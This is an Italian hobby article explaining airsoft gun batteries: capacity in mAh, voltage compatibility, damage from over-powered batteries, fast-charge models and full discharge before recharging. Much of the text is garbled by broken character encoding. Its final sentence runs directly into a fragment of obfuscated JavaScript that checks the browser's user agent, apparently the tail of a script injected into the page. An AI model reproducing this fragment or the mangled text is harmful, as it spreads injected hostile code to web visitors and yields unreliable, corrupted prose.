Softair – Batterie e scaricabatterie

0
127

I fucili da softair sono elettrici, e richiedono di essere alimentati con batterie particolari. La principale marca produttrice di tali batterie A? la Sanyo.

Le batterie da softair sono delle NiCd o NiMh ricararicabili con effetti di memoria (devono quindi essere completamente scariche prima di poterle ricaricare). A seconda della potenza della batteria A? possibile che una batteria carica duri anche piA? di una singola partita e che permetta di sparare qualche migliaio di pallini.

La potenza di queste batterie (come di tutte le altre) si misura in milliampere-ora (mAh). Le meno potenti sono da 300 o 700 mAh, le piA? potenti arrivano a 1700 o 2100 mAh. Una batteria da 1000 mAh puA? erogare 1000 milliampere per unai??i??ora intera prima di esaurirsi, se erogasse 500 milliampere rimarrebbe accesa per due ore e cosAi?? via.

Esistono diversi formati di queste batterie a seconda del fucile e della parte di esso in cui vengano inserite: i fucili a calcio fisso permettono di utilizzare batterie di grosse dimensioni (e quindi piA? potenti, ma anche leggermente piA? pesanti). Per essere inserita nella parte frontale del fucile (lai??i??impugnatura sotto la canna) la batteria deve essere di dimensioni minori.

Comprare batterie usate A? sempre una pessima idea dato che le batterie si rovinano con lai??i??uso (soprattutto se usate senza gli accorgimenti di cui parleremo tra poco), inoltre le prime batterie erano molto meno potenti di quelle attuali (difficilmente superavano i 700 mAh).

Alcune batterie sono da 9,6V altre da 8,4V altre ancora da 12V, ecc (la V A? un simbolo e sta per Volt). I fucili sono compatibili solo con alcuni di questi voltaggi, spesso con uno solo di essi. Usare una batteria troppo debole (con un voltaggio inferiore a quello supportato) non dovrebbe creare danni particolari, ma usare una batteria con voltaggio troppo alto puA? essere realmente deleterio: puA? bruciarsi e bruciare il fucile. PuA? rompere parti meccaniche (come ingranaggi o pistone).
Anche fucili con ingranaggi in metallo (Classic Army) possono rompersi facilmente con lai??i??uso di queste batterie (ad esempio gli ingranaggi del pistone, sono in plastica e si rompono facilmente). In altre parole si deve assolutamente evitare di montare batterie troppo potenti (puA? capitare che il fucile resista a diverse partite prima di rompersi, ma puA? anche rompersi dopo poche ore o minuti di gioco!).

Esistono poi anche batterie ai???fast chargeai??? (a carica rapida) piA? costose di quelle normali, ma molto piA? veloci a caricarsi. Una batteria normale impiega infatti circa 14 ore a caricarsi completamente, mentre un modello fast charge ne impiega appena 2.

Ricaricare una batteria non completamente scarica ne riduce la durata in maniera notevole. A lungo andare la vita della batteria ne soffrirAi?? pesantemente. Per questo motivo prima di ricaricare una batteria quasi scarica la si scarica completamente con un accessorio apposito che costa in media una ventina di euro. Lai??i??uso di tale strumento A? il metodo migliore per prolungare la vita di una batteria. dow[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}